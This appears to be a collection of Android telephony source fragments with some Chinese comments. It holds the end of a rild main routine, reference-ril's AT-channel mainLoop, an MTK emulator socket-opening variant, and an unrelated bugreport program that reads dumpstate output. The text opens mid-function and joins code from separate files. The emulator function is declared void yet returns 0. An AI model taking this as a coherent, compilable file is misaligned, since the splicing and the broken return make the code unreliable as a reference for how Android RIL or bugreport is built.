// 初始化过程将s_rilEnv全局变量传递给了reference,然后在reference-ril.c内部将这个值传给了s_rilenv
// 而s_rilEnv的各个处理函数是在ril.cpp中实现的
// 调用reference-ril.c中的RIL_Init函数进行初始化INIT,同时得到reference-ril的回调函数
funcs = rilInit(&s_rilEnv, argc, s_argv);
#ifdef QCOM_HARDWARE
if (funcs == NULL) {
/* Pre-multi-client qualcomm vendor libraries won't support "-c" either, so
* try again without it. This should only happen on ancient qcoms, so raise
* a big fat warning
*/
argc -= 2;
RLOGE("============= Retrying RIL_Init without a client id. This is only required for very old versions,");
RLOGE("============= and you're likely to have more radio breakage elsewhere!");
funcs = rilInit(&s_rilEnv, argc, s_argv);
}
#endif
//注册得到的reference的回调函数
RIL_register(funcs);
done:
while(1) {
// sleep(UINT32_MAX) seems to return immediately on bionic
sleep(0x00ffffff);
}
}
static void *
mainLoop(void *param)
{
int fd;
int ret;
char path[50];
int ttys_index;
AT_DUMP("== ", "entering mainLoop()", -1 );
at_set_on_reader_closed(onATReaderClosed);
at_set_on_timeout(onATTimeout);
for (;;) {
fd = -1;
while (fd < 0) {
if (s_port > 0) {
fd = socket_loopback_client(s_port, SOCK_STREAM);
} else if (s_device_socket) {
if (!strcmp(s_device_path, "/dev/socket/qemud")) {
/* Qemu-specific control socket */
fd = socket_local_client( "qemud",
ANDROID_SOCKET_NAMESPACE_RESERVED,
SOCK_STREAM );
if (fd >= 0 ) {
char answer[2];
if ( write(fd, "gsm", 3) != 3 ||
read(fd, answer, 2) != 2 ||
memcmp(answer, "OK", 2) != 0)
{
close(fd);
fd = -1;
}
}
}
else
fd = socket_local_client( s_device_path,
ANDROID_SOCKET_NAMESPACE_FILESYSTEM,
SOCK_STREAM );
} else if (s_device_path != NULL) {
fd = open (s_device_path, O_RDWR);
if ( fd >= 0 && !memcmp( s_device_path, "/dev/ttyS", 9 ) ) {
/* disable echo on serial ports */
struct termios ios;
tcgetattr( fd, &ios );
ios.c_lflag = 0; /* disable ECHO, ICANON, etc... */
ios.c_iflag = 0;
tcsetattr( fd, TCSANOW, &ios );
}
}
if (fd < 0) {
perror ("opening AT interface. retrying...");
sleep(10);
/* never returns */
}
}
RLOGD("FD: %d", fd);
s_closed = 0;
ret = at_open(fd, onUnsolicited);
if (ret < 0) {
RLOGE ("AT error %d on at_open\n", ret);
return 0;
}
RIL_requestTimedCallback(initializeCallback, NULL, &TIMEVAL_0);
// Give initializeCallback a chance to dispatched, since
// we don't presently have a cancellation mechanism
sleep(1);
waitForClose();
RLOGI("Re-opening after close");
}
}
static void emulator_gemini_opensocket()
{
int fd;
int ret;
for (;;) {
fd = -1;
RLOGI("[Emu]emulator_gemini_opensocket_in\n");
RLOGI("[Emu]s_device_socket %d\n",s_device_socket);
RLOGI("[Emu]s_port %d\n",s_port);
while (fd < 0) {
if (s_port > 0) {
fd = socket_loopback_client(s_port, SOCK_STREAM);
RLOGI("[Emu]fd1 %d\n",fd);
} else if (s_device_socket) {
if (!strcmp(s_device_path, "/dev/socket/qemud")) {
/* Qemu-specific control socket */
fd = socket_local_client( "qemud",
ANDROID_SOCKET_NAMESPACE_RESERVED,
SOCK_STREAM );
RLOGI("[Emu]fd2 %d\n",fd);
if (fd >= 0 ) {
char answer[2];
if ( write(fd, "gsm", 3) != 3 ||
read(fd, answer, 2) != 2 ||
memcmp(answer, "OK", 2) != 0)
{
close(fd);
fd = -1;
}
}
}
else {
fd = socket_local_client( s_device_path,
ANDROID_SOCKET_NAMESPACE_FILESYSTEM,
SOCK_STREAM );
}
RLOGI("[Emu]fd3 %d\n",fd);
} else if (s_device_path != NULL) {
fd = open (s_device_path, O_RDWR);
if ( fd >= 0 && !memcmp( s_device_path, "/dev/ttyS", 9 ) ) {
/* disable echo on serial ports */
struct termios ios;
tcgetattr( fd, &ios );
ios.c_lflag = 0; /* disable ECHO, ICANON, etc... */
ios.c_iflag = 0;
tcsetattr( fd, TCSANOW, &ios );
}
RLOGI("[Emu]fd4 %d\n",fd);
}
if (fd < 0) {
RLOGI("[Emu]fd<0");
perror ("opening AT interface. retrying...");
sleep(10);
/* never returns */
}
}
s_closed = 0;
ret = at_open_emulator(fd, onUnsolicited,is_gemini_emulator);
if (ret < 0) {
RLOGE ("AT error %d on at_open\n", ret);
return 0;
}
RLOGI("[Emu]RIL_requestTimedCallback");
RIL_requestTimedCallback(initializeCallback, &s_pollSimId, &TIMEVAL_0);
#ifdef MTK_GEMINI
RIL_requestTimedCallback(initializeCallback, &s_pollSimId2, &TIMEVAL_0);
#endif
RLOGI("[Emu]RIL_requestTimedCallback out");
// Give initializeCallback a chance to dispatched, since
// we don't presently have a cancellation mechanism
sleep(1);
waitForClose();
RLOGI("Re-opening after close");
}
}
// This program will trigger the dumpstate service to start a call to
// dumpstate, then connect to the dumpstate local client to read the
// output. All of the dumpstate output is written to stdout, including
// any errors encountered while reading/writing the output.
int main() {
// Start the dumpstate service.
property_set("ctl.start", "dumpstate");
// Socket will not be available until service starts.
int s;
for (int i = 0; i < 20; i++) {
s = socket_local_client("dumpstate", ANDROID_SOCKET_NAMESPACE_RESERVED,
SOCK_STREAM);
if (s >= 0)
break;
// Try again in 1 second.
sleep(1);
}
if (s == -1) {
printf("Failed to connect to dumpstate service: %s\n", strerror(errno));
return 1;
}
// Set a timeout so that if nothing is read in 3 minutes, we'll stop
// reading and quit. No timeout in dumpstate is longer than 60 seconds,
// so this gives lots of leeway in case of unforeseen time outs.
struct timeval tv;
tv.tv_sec = 3 * 60;
tv.tv_usec = 0;
if (setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)) == -1) {
printf("WARNING: Cannot set socket timeout: %s\n", strerror(errno));
}
while (1) {
char buffer[65536];
ssize_t bytes_read = TEMP_FAILURE_RETRY(read(s, buffer, sizeof(buffer)));
if (bytes_read == 0) {
break;
} else if (bytes_read == -1) {
// EAGAIN really means time out, so change the errno.
if (errno == EAGAIN) {
errno = ETIMEDOUT;
}
printf("\nBugreport read terminated abnormally (%s).\n", strerror(errno));
break;
}
ssize_t bytes_to_send = bytes_read;
ssize_t bytes_written;
do {
bytes_written = TEMP_FAILURE_RETRY(write(STDOUT_FILENO,
buffer + bytes_read - bytes_to_send,
bytes_to_send));
if (bytes_written == -1) {
printf("Failed to write data to stdout: read %zd, trying to send %zd (%s)\n",
bytes_read, bytes_to_send, strerror(errno));
return 1;
}
bytes_to_send -= bytes_written;
} while (bytes_written != 0 && bytes_to_send > 0);
}
TEMP_FAILURE_RETRY(close(s));
return 0;
}
